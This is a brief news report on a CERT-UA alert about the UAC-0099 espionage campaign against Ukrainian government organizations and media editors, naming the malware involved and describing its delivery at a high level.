A cyber-espionage operation has been targeting Ukrainian government organizations and editors working for media outlets since at least second half of 2022, Computer Emergency Response Team of Ukraine (CERT-UA) has warned in a new security alert.

The espionage campaign involves malicious files (.HTA, .EXE, .RAR, .LNK) delivered via email and messaging apps that drop a PowerShell script called ‘Lonepage’ onto the compromised machine. In turn, Lonepage downloads a TXT file (“upgrade.txt”) from an attacker’s server, which contains PowerShell commands that then executed on the target system.

Additionally, several malware tools have been observed in this operation such as Thumbchop (an information stealer that targets popular web browsers like Chrome and Opera), and the Clogflag keylogger. The attackers use Tor and SSH for remote access to the target machine.

During the analysis the experts also found two samples of Go-based malware, namely, Seaglow and Overjam.

In some cases the threat actor attempted to move deeper in the victim network with the goal of compromising privileged users and gaining access to corporate information systems.

CERT-UA says that between 2022 and 2023 the threat actor compromised several dozen victims in Ukraine. The team is tracking this malicious activity as UAC-0099.

Last week, the Ukrainian defenders warned of a new wave of SmokeLoader attacks orchestrated by a threat actor known as UAC-0006.